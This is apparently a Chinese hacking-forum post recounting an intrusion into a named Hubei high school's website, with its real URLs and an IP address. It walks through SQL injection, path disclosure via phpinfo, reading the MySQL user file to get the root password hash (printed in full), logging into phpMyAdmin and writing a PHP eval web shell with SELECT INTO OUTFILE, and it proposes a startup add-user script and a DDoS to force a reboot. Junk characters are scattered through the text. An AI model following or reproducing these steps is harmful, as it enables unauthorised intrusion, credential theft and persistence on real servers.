友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
! u+ {; t0 v" Q; x4 d发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
  t* C: Q) s3 X: P! z7 P+ `' D


  w3 t+ w) T3 K, f( H4 H+ z. j  }3 \常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：
# S2 [9 H1 N! C' B6 Q

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

, W1 _/ s2 V) ]7 Y3 G* Q$ D试着爆绝对路径：
9 M* V6 q! D9 A# _1 b  L8 V1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
. L  P4 R6 D/ E, X2 {- b4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 H% W/ c- A: |8 O" |& q" |5./phpmyadmin/libraries/select_lang.lib.php  
3 R  _! h) \0 g0 x7 }- {6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
  Y  e- a4 b7 u4 r; e* k
/ W2 w' U4 l, s- [均不行...........................

" x* I& h, ?, z+ N9 h御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

: M: U3 ]2 @* M3 Y默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
) t+ |/ X1 ?- b, u! Z) o/ {
* ]# M' P, a3 }5 W/ k" B* v敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
) E# k! D* X9 P; }4 L0 S
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
$ l/ |0 U; J4 u, s
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
% \9 I" G4 h# j
成功读到root密码：
* G# R7 A1 N/ a  ]6 |/ M' M( r
17---- r(0072)
, \. r* A. r/ q4 ]2 ]# C  Q18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
* L; N9 D% a0 u) c* Z( k23---- 2(0032)
24---- E(0045)
25---- 1(0031)
& w# z/ k) c5 x: J26---- C(0043)
5 `$ C, y3 |3 J# g+ F3 M9 K27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
  q) ?7 H/ a0 `31---- A(0041)
. Q+ [  f2 I( ?' ]32---- 9(0039)
33---- B(0042)
6 h' w2 {# Z' G34---- 5(0035)
35---- 4(0034)
/ g. I/ v( q- B, P) D# f36---- 8(0038)
  F. F1 m0 K9 p" Q9 [+ Q- S) y37---- 6(0036)
# ?5 x- A) f+ }; M$ e38---- 4(0034)
/ a9 N) z- {5 U% |39---- 9(0039)
40---- 1(0031)
, r: z: J7 j+ L; S) b41---- 1(0031)
5 O" Q/ z' m7 ]9 b$ h; A$ p& K42---- 5(0035)
, p3 L2 w6 i8 _' B' F1 v4 f2 M43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
2 r  |1 i3 [# P46---- 8(0038)
47---- F(0046)
6 H) j5 ]7 m# x7 I5 b( k, Z48---- F(0046)
3 q: g% E- G- m49---- 4(0034)
9 Y" f5 `& P  a50---- F(0046)
51---- 0(0030)
52---- 3(0033)
! P. \. O. V2 \  f9 H# `- Y53---- 2(0032)
, t# Z3 Q- _& i8 u' ^1 `9 q# l54---- A(0041)
55---- 4(0034)
5 \: \, }- p8 z& R& F# K! K) @56---- A(0041)
57---- B(0042)
58---- *(0044)
59---- *(0035)
3 L, a! D6 W9 R! ^2 D60---- *(0041)
' D$ z/ b$ a: X1 Y6 D) Q61---- *0032)

! b( b" m) T0 |解密后成功登陆phpmyamin
4 Q, ?4 g( P' s2 @2 G                          
1 G/ _5 R7 t& o% s' e* `
1 C9 e5 _0 W, q% I+ h: B                             

3 N+ s' A* i7 T8 _找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

/ H% q( Z( p  G0 `; ]8 ?6 m成功执行，拿下shell，菜刀连接：
  T! @! d! M. l% S& |, |: K8 `5 O
2 w0 e; v+ [7 f6 {3 s. A  D- W服务器不支持asp,aspx,php提权无果...................
+ t/ f4 u0 g0 S' n; B( S
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
$ D- \: s- j& F/ }+ @3 d

服务器上已经有个隐藏帐号了

; u* P; _& }5 M& F) U4 S+ k" H

别名     administrators
$ I' A* l4 s' g6 d6 V注释     管理员对计算机/域有不受限制的完全访问权

! _, m( U5 M& D  D& @5 g4 }

成员

. K3 s$ x1 ?' V, `, h" c% R) U

-------------------------------------------------------------------------------
- |, s( {3 ~; E7 y1 ]) Tadmin
7 u1 S2 o5 W! RAdministrator
slipper$
sqluser
' M! D+ l$ ]/ N9 {! E4 S, I命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................
0 h% P! b. C; B9 y. m$ ]
      

angel